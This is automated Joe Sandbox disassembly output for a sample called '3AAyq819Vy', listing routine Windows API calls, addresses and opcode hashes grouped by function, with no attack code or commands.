                                                                                              • API String ID: 1269201914-1492261280
                                                                                              • Opcode ID: fa416d7b8da026fc1e6f1f3752d7f682778d54c790f454549d5f0d539abe8c50
                                                                                              • Instruction ID: 021770638c5dd6bdfd92bdb09e37d73dff09b89c870cdf214e942e098575e569
                                                                                              • Opcode Fuzzy Hash: fa416d7b8da026fc1e6f1f3752d7f682778d54c790f454549d5f0d539abe8c50
                                                                                              • Instruction Fuzzy Hash: 70B012C629B4437C3908A2061E42CF7090DC4C0F90730803FF504C41C1DC814C026471
                                                                                              APIs
                                                                                                • Part of subcall function 00CCB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CCBA44,?), ref: 00CCB7E6
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00CCBA89,?,00000000), ref: 00CCBC64
                                                                                              • GetCPInfo.KERNEL32(00000000,00CCBA89,?,?,?,00CCBA89,?,00000000), ref: 00CCBC77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              • Opcode ID: 757025bc3e4f877b919ec3571e8b83dd9f2a4cb2765b6be72bb7a57fdcac0564
                                                                                              • Instruction ID: 977381dbbbd8e00518c623df280d3d073a3020cc2a03f5ea096720697be780e7
                                                                                              • Opcode Fuzzy Hash: 757025bc3e4f877b919ec3571e8b83dd9f2a4cb2765b6be72bb7a57fdcac0564
                                                                                              • Instruction Fuzzy Hash: 0F513470D002559EDB209FF5C892FBABBE4EF41310F1844AED4A68B292D7359E46DB90
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00CA9A50,?,?,00000000,?,?,00CA8CBC,?), ref: 00CA9BAB
                                                                                              • GetLastError.KERNEL32(?,00000000,00CA8411,-00009570,00000000,000007F3), ref: 00CA9BB6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: a6911dc62e7ea2487d6642fef465f896f9d048dd987071edd187a1614696d68c
                                                                                              • Instruction ID: 8326a9fa10847b2be58e35ee6c3387fa97d6c916d03bf65f0100788cebc6d5e6
                                                                                              • Opcode Fuzzy Hash: a6911dc62e7ea2487d6642fef465f896f9d048dd987071edd187a1614696d68c
                                                                                              • Instruction Fuzzy Hash: E541CF305043438FDB34DF15F5865AAB7E5FBD6718F148A2EE8A283260D770AE458B61
                                                                                              APIs
                                                                                                • Part of subcall function 00CC97E5: GetLastError.KERNEL32(?,00CE1030,00CC4674,00CE1030,?,?,00CC3F73,00000050,?,00CE1030,00000200), ref: 00CC97E9
                                                                                                • Part of subcall function 00CC97E5: _free.LIBCMT ref: 00CC981C
                                                                                                • Part of subcall function 00CC97E5: SetLastError.KERNEL32(00000000,?,00CE1030,00000200), ref: 00CC985D
                                                                                                • Part of subcall function 00CC97E5: _abort.LIBCMT ref: 00CC9863
                                                                                                • Part of subcall function 00CCBB4E: _abort.LIBCMT ref: 00CCBB80
                                                                                                • Part of subcall function 00CCBB4E: _free.LIBCMT ref: 00CCBBB4
                                                                                                • Part of subcall function 00CCB7BB: GetOEMCP.KERNEL32(00000000,?,?,00CCBA44,?), ref: 00CCB7E6
                                                                                              • _free.LIBCMT ref: 00CCBA9F
                                                                                              • _free.LIBCMT ref: 00CCBAD5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2991157371-0
                                                                                              • Opcode ID: 0aa05f4efde5c916709959787294f2dc7c52eea238b1a0dab8dd1136dbdd7147
                                                                                              • Instruction ID: 2ac9841de90c678c7fc9d914c852aca8e6e3e50586e18738530482f033867ee2
                                                                                              • Opcode Fuzzy Hash: 0aa05f4efde5c916709959787294f2dc7c52eea238b1a0dab8dd1136dbdd7147
                                                                                              • Instruction Fuzzy Hash: 0131B631904209AFDB10EFE9D446F9DB7F5EF40320F25409EE9549B2A2EB329E45EB50
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA1E55
                                                                                                • Part of subcall function 00CA3BBA: __EH_prolog.LIBCMT ref: 00CA3BBF
                                                                                              • _wcslen.LIBCMT ref: 00CA1EFD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2838827086-0
                                                                                              • Opcode ID: d3543707c85aac9dabacb2b2620d9e7067afafccd770ab7e3761d7d9258e02d4
                                                                                              • Instruction ID: ec4268c25746a2dc193b7fef3fca47dd43f184ae0746ea50b409f9e658b91bdf
                                                                                              • Opcode Fuzzy Hash: d3543707c85aac9dabacb2b2620d9e7067afafccd770ab7e3761d7d9258e02d4
                                                                                              • Instruction Fuzzy Hash: E4317A7190424AAFCF11DF98D955AEEBBF6BF09304F24006EF845A7251CB325E00DB60
                                                                                              APIs
                                                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CA73BC,?,?,?,00000000), ref: 00CA9DBC
                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CA9E70
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$BuffersFlushTime
                                                                                              • String ID:
                                                                                              • API String ID: 1392018926-0
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CA9F27,?,?,00CA771A), ref: 00CA96E6
                                                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CA9F27,?,?,00CA771A), ref: 00CA9716
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00CA9EC7
                                                                                              • GetLastError.KERNEL32 ref: 00CA9ED4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00CC8E75
                                                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CCCA2C,00000000,?,00CC6CBE,?,00000008,?,00CC91E0,?,?,?), ref: 00CC8E38
                                                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00CE1098,00CA17CE,?,?,00000007,?,?,?,00CA13D6,?,00000000), ref: 00CC8EB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Heap$AllocAllocate_free
                                                                                              • String ID:
                                                                                              • API String ID: 2447670028-0
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00CB10AB
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CB10B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA501
                                                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA532
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641,000000FF), ref: 00CAA1F1
                                                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641), ref: 00CAA21F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: DeleteFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2643169976-0
                                                                                              APIs
                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00CD2641,000000FF), ref: 00CBACB0
                                                                                              • CoUninitialize.COMBASE(?,?,?,?,00CD2641,000000FF), ref: 00CBACB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 3856339756-0
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00CAA23A,?,00CA755C,?,?,?,?), ref: 00CAA254
                                                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CAA23A,?,00CA755C,?,?,?,?), ref: 00CAA280
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00CBDEEC
                                                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00CBDF03
                                                                                                • Part of subcall function 00CBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                                                                • Part of subcall function 00CBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                                                                • Part of subcall function 00CBB568: IsDialogMessageW.USER32(0001046E,?), ref: 00CBB59E
                                                                                                • Part of subcall function 00CBB568: TranslateMessage.USER32(?), ref: 00CBB5AC
                                                                                                • Part of subcall function 00CBB568: DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                              APIs
                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CBA3DA
                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CBA3E1
                                                                                              Similarity
                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                              APIs
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC2BAA
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CC2BB5
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: ItemShowWindow
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA8289
                                                                                                • Part of subcall function 00CA13DC: __EH_prolog.LIBCMT ref: 00CA13E1
                                                                                                • Part of subcall function 00CAA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CAA598
                                                                                              Similarity
                                                                                              • API ID: H_prolog$CloseFind
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA13E1
                                                                                                • Part of subcall function 00CA5E37: __EH_prolog.LIBCMT ref: 00CA5E3C
                                                                                                • Part of subcall function 00CACE40: __EH_prolog.LIBCMT ref: 00CACE45
                                                                                                • Part of subcall function 00CAB505: __EH_prolog.LIBCMT ref: 00CAB50A
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA13E1
                                                                                                • Part of subcall function 00CA5E37: __EH_prolog.LIBCMT ref: 00CA5E3C
                                                                                                • Part of subcall function 00CACE40: __EH_prolog.LIBCMT ref: 00CACE45
                                                                                                • Part of subcall function 00CAB505: __EH_prolog.LIBCMT ref: 00CAB50A
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CBB098
                                                                                                • Part of subcall function 00CA13DC: __EH_prolog.LIBCMT ref: 00CA13E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00CCACF8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CACE45
                                                                                                • Part of subcall function 00CA5E37: __EH_prolog.LIBCMT ref: 00CA5E3C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                                • Part of subcall function 00CCB136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC9813,00000001,00000364,?,00CC3F73,00000050,?,00CE1030,00000200), ref: 00CCB177
                                                                                              • _free.LIBCMT ref: 00CCC4E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00CC9813,00000001,00000364,?,00CC3F73,00000050,?,00CE1030,00000200), ref: 00CCB177
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00CC3C3F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CCCA2C,00000000,?,00CC6CBE,?,00000008,?,00CC91E0,?,?,?), ref: 00CC8E38
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00CA5AC2
                                                                                                • Part of subcall function 00CAB505: __EH_prolog.LIBCMT ref: 00CAB50A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1728684930.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1728672048.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728711282.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728725550.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1728765089.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ca0000_3AAyq819Vy.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
